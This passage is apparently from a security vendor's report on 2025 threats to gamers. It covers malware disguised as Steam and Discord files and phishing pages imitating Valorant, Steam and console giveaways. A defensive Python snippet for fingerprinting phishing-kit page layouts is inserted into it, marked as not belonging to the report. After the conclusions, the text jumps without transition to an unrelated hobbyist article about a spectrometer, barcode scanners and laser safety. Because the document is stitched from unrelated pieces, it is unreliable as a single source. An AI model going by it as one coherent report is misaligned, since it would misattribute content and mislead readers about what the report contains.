In previous years, Steam consistently ranked as the platform with the highest number of attempted attacks. Its extensive game library, active modding ecosystem, and long-standing role in the gaming community made it a prime target for cybercriminals distributing malicious files disguised as mods, cheats, or cracked versions. In 2025, however, the landscape changed significantly. The gap between Steam and Discord expanded to an unprecedented degree as Steam-related figures remained within their typical fluctuation range of the past five years, while the number of attempted Discord-disguised attacks surged more than 14 times compared to 2024, reshaping the hierarchy of targeted gaming platforms.
Attempts to attack users through malicious or unwanted files disguised as Steam and Discord throughout the reported period
From January to October 2025, cybercriminals used a variety of cyberthreats disguised as platforms popular with gamers, modifications or circumvention options. RiskTool dominated the threat landscape with 17,845,099 detections, far more than any other category. Although not inherently malicious, these tools can hide files, mask processes, or disable programs, making them useful for stealthy, persistent abuse, including covert crypto-mining. Downloaders ranked second with 1,318,743 detections. These appear harmless but may fetch additional malware among other downloaded files. Downloaders are typically installed when users download unofficial patches, cracked clients, or mods. Trojans followed with 384,680 detections, often disguised as cheats or mod installers. Once executed, they can steal credentials, intercept tokens, or enable remote access, leading to account takeovers and the loss of in-game assets.
| Threat | Gaming-related detections |
| --- | --- |
| RiskTool | 17,845,099 |
| Downloader | 1,318,743 |
| Trojan | 384,680 |
| Adware | 184,257 |
| Exploit | 152,354 |
Phishing and scam threats targeting gamers
In addition to tracking malicious and unwanted files disguised as gamers’ platforms, Kaspersky experts also analysed phishing pages which impersonated these services. Between January and October 2025, Kaspersky products detected 2,054,336 phishing attempts targeting users through fake login pages, giveaway offers, “discounted” subscriptions and other scams which impersonated popular platforms like Steam, PlayStation, Xbox and gaming stores.
Example of Black Friday scam using a popular shooter as a lure
The page shown in the screenshot is a typical Black Friday-themed scam that targets gamers, designed to imitate an official Valorant promotion. The “Valorant Points up to 80% off” banner, polished layout, and fake countdown timer create urgency and make the offer appear credible at first glance. Users who proceed are redirected to a fake login form requesting Riot account credentials or bank card details. Once submitted, this information enables attackers to take over accounts, steal in-game assets, or carry out fraudulent transactions.
Minor text errors reveal the page’s fraudulent nature. The phrase “You should not have a size limit of 5$ dollars in your account” is grammatically incorrect and clearly suspicious.
Another phishing page relies on a fabricated “Winter Gift Marathon” that claims to offer a free $20 Steam gift card. The seasonal framing, combined with a misleading counter (“251,110 of 300,000 cards received”), creates an artificial sense of legitimacy and urgency intended to prompt quick user interaction.
The central component of the scheme is the “Sign in” button, which redirects users to a spoofed Steam login form designed to collect their credentials. Once obtained, attackers can gain full access to the account, including payment methods, inventory items, and marketplace assets, and may be able to compromise additional services if the same password is used elsewhere.
Examples of scams themed around the PlayStation 5 Pro and Xbox Series X
Scams themed around the PlayStation 5 Pro and Xbox Series X appear to be generated from a phishing kit, a reusable template that scammers adapt for different brands. Despite referencing two consoles, both pages follow the same structure, which features a bold claim offering a chance to “win” a high-value device, a large product image on the left, and a minimalistic form on the right requesting the user’s email address.
A yellow banner promotes an “exclusive offer” with “limited availability,” pressuring users to respond quickly. After submitting an email, victims are typically redirected to additional personal and payment data-collection forms. They also may later be targeted with follow-up phishing emails, spam, or malicious links.
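One way a defender can surface the kit reuse described above, where pages for different brands share one structure, is to fingerprint each page's tag skeleton and ignore its text. This is an added example, not code from the report; the sample pages, class names and function names are constructed for illustration.

```python
import hashlib
from html.parser import HTMLParser

VOID = {"img", "input", "br", "hr", "meta", "link"}  # tags with no closing tag

class Skeleton(HTMLParser):
    """Records depth:tag tokens, dropping text, class names and URLs."""
    def __init__(self):
        super().__init__()
        self.tokens, self.depth = [], 0

    def handle_starttag(self, tag, attrs):
        # Keep input types: the shape of the data-collection form is part of the kit.
        kind = (dict(attrs).get("type") or "") if tag == "input" else ""
        self.tokens.append(f"{self.depth}:{tag}:{kind}")
        if tag not in VOID:
            self.depth += 1

    def handle_endtag(self, tag):
        if tag not in VOID and self.depth > 0:
            self.depth -= 1

def skeleton(html):
    parser = Skeleton()
    parser.feed(html)
    parser.close()
    return parser.tokens

def fingerprint(html):
    """Exact-match key for clustering pages built from one template."""
    return hashlib.sha256("\n".join(skeleton(html)).encode()).hexdigest()[:16]

def similarity(a, b):
    """Jaccard overlap of 3-token shingles; tolerates small template edits."""
    def shingles(t):
        return {tuple(t[i:i + 3]) for i in range(max(1, len(t) - 2))}
    sa, sb = shingles(skeleton(a)), shingles(skeleton(b))
    return len(sa & sb) / len(sa | sb)

# Constructed sample pages: two brand variants of one layout, one unrelated page.
PAGE = ('<html><body><div class="{c}">Exclusive offer</div><div><div>'
        '<img src="{i}"></div><div><h1>Win a {n}</h1><form>'
        '<input type="email"><button>Continue</button></form></div></div>'
        '</body></html>')
PS5 = PAGE.format(c="bar-y", i="ps5.png", n="PlayStation 5 Pro")
XBOX = PAGE.format(c="promo", i="xbox.jpg", n="Xbox Series X")
SHOP = ('<html><body><nav><ul><li><a href="/">Home</a></li></ul></nav>'
        '<main><h1>Store</h1><p>Catalogue</p></main></body></html>')

if __name__ == "__main__":
    print(fingerprint(PS5) == fingerprint(XBOX), similarity(PS5, SHOP))
```

The exact fingerprint groups untouched copies of a template, while the shingle similarity still scores high when an operator adds or removes an element or two.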
Conclusions
In 2025, the ongoing expansion of global e-commerce continued to be reflected in the cyberthreat landscape, with phishing, scam activity, and financial malware targeting online shoppers worldwide. Peak sales periods once again created favorable conditions for fraud, resulting in sustained activity involving spoofed retailer pages, fraudulent email campaigns, and seasonal spam.
Threat actors also targeted users of digital entertainment and subscription services. The gaming sector experienced a marked increase in malicious activity, driven by shifts in platform accessibility and the widespread use of third-party tools. The significant rise in malicious detections associated with Discord underscored how rapidly attackers adjust to changes in user behavior.
Overall, 2025 demonstrated that cybercriminals continue to leverage predictable user behavior patterns and major sales events to maximize the impact of their operations. Consumers should remain especially vigilant during peak shopping periods and use stronger security practices, such as two-factor authentication, secure payment methods, and cautious browsing. A comprehensive security solution that blocks malware, detects phishing pages, and protects financial data can further reduce the risk of falling victim to online threats.
Barcodes, “Lasers”, and Fourier Transforms
The Bomem DA3 is a type of Fourier transform spectrometer used for measuring various spectral data and [Usagi Electric] has one. On his quest to understand it he runs down a number of rabbit holes, including learning about various barcode formats, doing a teardown of the Telxon LS-201 barcode scanner, and exploring how lasers work. That’s right: lasers!
His reason for looking at the Telxon LS-201 barcode scanner is that it has the same type of helium-neon laser as his Bomem DA3 uses. Since he’s learning about barcode scanners he thinks it’s prudent to learn about barcode formats too, and he has a discussion with our very own Adam Fabio about such things, including the UPC-A standard barcodes.
It’s fun seeing the mainboard of the Telxon LS-201 sporting the familiar 555 timer, LM393 comparator, and three op-amps: 5532, LF347, and TL062; no discrete logic in sight! If you’re interested in barcode tech you might like to read Barcodes Enter The Matrix In 2027 and Old Barcode Scanner Motherboards Live Again. The particular Hackaday article mentioned in the video is this one: The Eloquence Of The Barcode.
Also, in the interest of public health and safety, make sure you’re wearing laser protection glasses if you’re working with laser technology. Even low power lasers can do damage to your eyes. Laser emissions can be invisible to the human eye and you don’t have nerves that tell you when your eyeballs are being roasted, so take care out there!
youtube.com/embed/YVBJg0J1v1s?…